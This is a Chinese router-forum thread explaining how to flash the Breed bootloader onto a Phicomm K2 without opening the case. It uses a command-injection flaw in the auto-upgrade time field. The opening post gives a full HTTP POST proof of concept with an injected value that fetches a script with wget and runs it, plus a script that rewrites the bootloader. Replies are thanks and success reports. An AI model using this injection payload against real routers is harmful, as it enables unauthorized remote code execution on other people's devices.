[k2]斐讯K2 v22.6.534.263 直接刷固件！【附工具】 免拆机ttl

查看: 72074|回复: 253

[k2]

斐讯K2 v22.6.534.263 直接刷固件！【附工具】 免拆机ttl

火...

[复制链接]

颜鹤卿

颜鹤卿

当前离线

积分39

IP卡

狗仔卡

电梯直达

1#

发表于 2023-2-15 00:57

|

只看该作者

|倒序浏览

|阅读模式

本帖最后由 颜鹤卿 于 2023-2-16 01:38 编辑

2023.02.15 上工具

适用【v22.6.534.263】【v22.6.529.216】等，更多大家自己试。

我只测试了这两个比较高的版本，我手头现有的两台K2（硬件A2）均OK。

之前一致没找到现成的工具可用，昨晚发帖后经网友提示，找到了tianhaoba大佬之前写的工具。

直接用无法成功，所以今天根据原理做了修改，感谢前人大佬耕耘，小小修改送给大家。

原工具支持：

K1： V22.4.2.15

K1S：V22.3.1.5

K2： V22.2.15.128 V22.3.15.232 V22.3.17.148

V22.4.2.8 V22.4.2.9

V22.4.5.39 V22.4.5.42

V22.4.6.3

V22.5.7.118 V22.5.9.163 V22.5.10.530 V22.5.10.552 V22.5.11.5

V22.6.503.31 V22.6.506.28 V22.6.507.43 V22.6.510.57 V22.6.511.69 V22.6.512.75 V22.6.518.161

K2P：V22.8.5.189

大家测测看吧，期待您的反馈。

下面是原帖原理说明等内容，不想看的可以忽略。

------------------------------------------------------------------------------

各位恩山的朋友，大家好！

本人今天之前从未接触过路由器刷机，家里的K2用了很多年了。

今天是由于实在苦恼v22.6.534.263版本的广告，经常劫持，弹出一些不明觉厉很黄很暴力的页面。

所以趁今天家里人都出门了，打算好好研究一下，给它办了！

由于之前没关注过，今天有幸看到恩山论坛，以及网上各路视频、文字等教程，

总算对路由器刷机有了一定的了解，但不幸的是，我的是最新版本，没有现成的教程和工具可用，

所以在了解了原理后，自行手动，从下午一直研究到现在，没错搞到23:30多，终于直刷成功！

看到有很多朋友受此版本困扰，所以特地注册发帖把将方法分享出来！

如果有大神看到，可以直接集成进工具，原理和前几版本都一样！

废话结束------------------------------------------------------

路由器型号：K2

硬件版本：A2

软件版本：22.6.534.263

我看到的刷机工具都是利用路由器web管理系统漏洞，在路由器上执行shell命令，进行开启telnet、ssh等，然后用命令执行操作的。

v22.6.534.263版本一样有命令执行漏洞，详细见CVE漏洞公告【CVE-2022-48070】

漏洞位置：“自动升级”--》“升级时间”处

证明有效的POC：

完整数据包：

POST http://192.168.2.1/cgi-bin/luci/;stok=73fbbfe80fb9f7d9d881a576b0d56122/admin/more_sysset/autoupgrade/save HTTP/1.1

Host: 192.168.2.1

Connection: keep-alive

Content-Length: 25

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.2.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.2.1/cgi-bin/luci/;stok=38a2772da5876e02bb05b34e1dc8d1dc/admin/more_sysset/autoupgrade/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: sysauth=417a4f67659bacbd2b8defdec94822c8

mode=1&autoUpTime=00%3A00%3A05%7Cid%20复制代码

验证成功后，开了telnet、ssh，但是我觉得没啥用，直接在web执行命令就能刷入breed了。

执行的命令如下：

wget http://本地服务器IP/breed.sh -O /tmp/breed.sh;chmod 755 /tmp/breed.sh;/tmp/breed.sh

所以完整POST包为：

mode=1&autoUpTime=00%3A00%3A05%7Cid%20%3Bwget%20http%3A%2F%2F%E6%9C%AC%E5%9C%B0%E6%9C%8D%E5%8A%A1%E5%99%A8IP%2Fbreed.sh%20-O%20%2Ftmp%2Fbreed.sh%3Bchmod%20755%20%2Ftmp%2Fbreed.sh%3B%2Ftmp%2Fbreed.sh复制代码

breed.sh内容如下：（脚本breed.sh和固件breed-mt7620-phicomm-psg1208.bin两个文件会放在附件，注意如果更换固件文件，则这个sh脚本中的文件md5值要改）

wget -T 10 http://本地服务器IP/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin

#判断是否有下载文件

if [ -f "/tmp/breed.bin" ] ;then

vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `

#判断下载文件的MD5值是否正确

if [ "$vmd5" = "06763991cf7f1768659e09401f966318" ] ;then

#如果正确则开始刷写breed

mtd unlock Bootloader

mtd -r write /tmp/breed.bin Bootloader

fi

fi复制代码

等待重启完毕，因为只是刷入了breed，所以正常启动的固件还是v22.6.534.263，一切正常后，

然后拔掉电源，按住reset键，插入电源，等待5秒松手，打开192.168.1.1看到了breed web。

然后刷入了网友推荐的第三方固件，试用几天看看还有没有广告。。。

因为从没搞过刷机，不知道方法对不对，还能不能在其他人那复现。写的不对的地方还请海涵！

总体思路和验证代码我尽量详细的给出了，我也不会做工具，感觉挺麻烦的。

还请大神或之前刷机软件的开发大神们集成进工具。

今天太晚了，后面我看看有没有现成的软件能方便的完成这些操作，再来跟大家分享。

斐讯k2固件论坛, 斐讯k2固件推荐

本帖子中包含更多资源

您需要 登录 才可以下载或查看，没有账号？立即注册

×

评分

参与人数 15恩山币 +19

收起

理由

a594175

+ 1

你好，久仰卧龙大名，在下凤雏！ ...

zxm3321

+ 1

果断收藏 关注加点赞

我望云

+ 2

你好，久仰卧龙大名，在下凤雏！.

zhbb666

+ 1

感谢你的分享，无论怎样，你都是最无私的人.

zhangjy_12

+ 1

一看就是觉得高端、大气、上档次！.

zu4103907

+ 2

风清云淡、飘逸悠然……极爽!

zooku

+ 1

你好，久仰卧龙大名，在下凤雏！.

dongjingnv

+ 1

牛XXX

wangchao1234

+ 1

有才

yktd

+ 2

一看就是觉得高端、大气、上档次！.

writelie

+ 1

强大的恩山！(以下重复1万次)

peytonzhu

+ 1

强大的恩山！(以下重复1万次)

33415790

+ 1

你好，久仰卧龙大名，在下凤雏！

bsctv

+ 2

风清云淡、飘逸悠然……极爽!

912818

+ 1

不错,支持下

查看全部评分

分享到:

QQ好友和群

QQ空间

收藏182

支持12

反对0

相关帖子

• #斐讯K2固件

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

使用道具

举报

置顶卡

沉默卡

喧嚣卡

顶贴卡

显身卡

zhangsm

zhangsm

当前离线

积分1597

IP卡

狗仔卡

2#

发表于 2023-2-15 01:24

|

只看该作者

牛逼，谢谢分享

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

八米云PCDN

八米云PCDN

当前离线

积分117

IP卡

狗仔卡

3#

发表于 2023-2-15 01:36

|

只看该作者

这个厉害，时隔多年，居然出了免拆刷法。。虽然看不懂。。。。。

点评

mokjf

早就免拆，我上一年就是免拆刷了bread，只是K2百兆网口性能有限，无奈放弃

详情

回复

发表于 2023-2-15 08:54

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

wulistock

wulistock

当前离线

积分1199

IP卡

狗仔卡

4#

发表于 2023-2-15 01:44

|

只看该作者

这个厉害了，收藏备用 改天抽空仔细看看

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

aiyy680

aiyy680

当前离线

积分1697

IP卡

狗仔卡

5#

发表于 2023-2-15 02:15

|

只看该作者

果然是高手，一点就通

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

chqghou

chqghou

当前离线

积分180

IP卡

狗仔卡

6#

发表于 2023-2-15 02:42

来自手机

|

只看该作者

我14号搞了一天没有刷机成功，麻烦问一下楼主，这伙人需要用到脚本吗？

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

chqghou

chqghou

当前离线

积分180

IP卡

狗仔卡

7#

发表于 2023-2-15 03:08

|

只看该作者

能详细说说那些开发者工具怎么使用的吗？

点评

颜鹤卿

整个调试流程比较麻烦。

楼下有朋友提示了有现成的工具可以改改用，我回头研究一下看行不行。

详情

回复

发表于 2023-2-15 16:00

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

蔡院长

蔡院长

当前离线

积分267

IP卡

狗仔卡

8#

发表于 2023-2-15 04:06

|

只看该作者

有没有大佬弄个工具啊

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

入秋

入秋

当前离线

积分276

IP卡

狗仔卡

9#

发表于 2023-2-15 06:14

|

只看该作者

免拆确实厉害了

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

lidonh

lidonh

当前离线

积分1625

IP卡

狗仔卡

10#

发表于 2023-2-15 07:21

|

只看该作者

高手，感谢分享。

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

叶增奎

叶增奎

当前离线

积分26

IP卡

狗仔卡

11#

发表于 2023-2-15 07:21

来自手机

|

只看该作者

我是把闪存拆下来编程器刷不死鸟然后再焊上去，最后刷老毛子固件

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

fwin

fwin

当前离线

积分2303

IP卡

狗仔卡

12#

发表于 2023-2-15 08:14

|

只看该作者

整个情人节都在捣鼓刷机啦，为你的奉献精神点赞

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

mokjf

mokjf

当前离线

积分705

IP卡

狗仔卡

13#

发表于 2023-2-15 08:54

|

只看该作者

矿佬 发表于 2023-2-15 01:36

这个厉害，时隔多年，居然出了免拆刷法。。虽然看不懂。。。。。

早就免拆，我上一年就是免拆刷了bread，只是K2百兆网口性能有限，无奈放弃

点评

chqghou

能说一下怎么刷的breed吗?谢谢。

详情

回复

发表于 2023-2-15 15:07

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

mokjf

mokjf

当前离线

积分705

IP卡

狗仔卡

14#

发表于 2023-2-15 08:55

|

只看该作者

我是用工具刷的bread，你这个用命令去操作显得更有技术，

点评

ptt

求工具啊，谢谢老哥

详情

回复

发表于 2023-3-26 14:31

chqghou

能分享一下工具吗？谢谢

详情

回复

发表于 2023-2-15 15:08

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡

ikbszj75089

ikbszj75089

当前离线

积分2972

IP卡

狗仔卡

15#

发表于 2023-2-15 10:35

|

只看该作者

这个漏洞应该早就利用了，你可以试着改一下旧的刷机脚本

下载刷机.zip解压，右键刷机.bat，记事本编辑查找替换，把autoUpTime=03%%3A03 替换成autoUpTime=03%%3A03%%3A03没测试

https://www.right.com.cn/forum/thread-209423-1-1.html

点评

psffff

执行完之后 192.168.2.1 管理员密码错误了咋办

详情

回复

发表于 2025-1-26 10:34

蜜酱胡萝卜派蒙

K2 A6 v22.6.534.263真的可以，太神了

详情

回复

发表于 2024-8-18 21:51

xianglei

大哥，k2p应该怎么利用这个漏洞

详情

回复

发表于 2023-10-14 17:24

yise35508

何必呢？少说几句吧，网络这么大，聚到一起也不容易！: 5 不喷一下你今晚是不是会失眠啊？药不能停啊，兄弟！: 5 好帖，今年最好的贴子！: 5 这B装的一流啊！: 5 真的是很凡尔赛！:

发表于 2023-10-11 16:50

15278507079

谢谢，263一次刷机成功

发表于 2023-10-5 22:52

lcdsp08

K2 A6 v22.6.534.263刷成功了，过了那么多年了，大佬真是牛逼啊

发表于 2023-8-4 11:44

颜鹤卿

感谢分享，我回头研究一下，那个下载要币，我新号没币，能分享一下吗，我研究研究改改看。

详情

回复

发表于 2023-2-15 15:55

lonelypers

大佬，按照你的提示，已成功刷机

详情

回复

发表于 2023-2-15 14:00

只谈技术、莫论政事！(点击见详情) | 恩山无线论坛欢迎您的来访，请互相尊重、友善交流，建议保持一颗平常心看待网友的评论，切勿过度反应。

回复

支持

反对

使用道具

举报

显身卡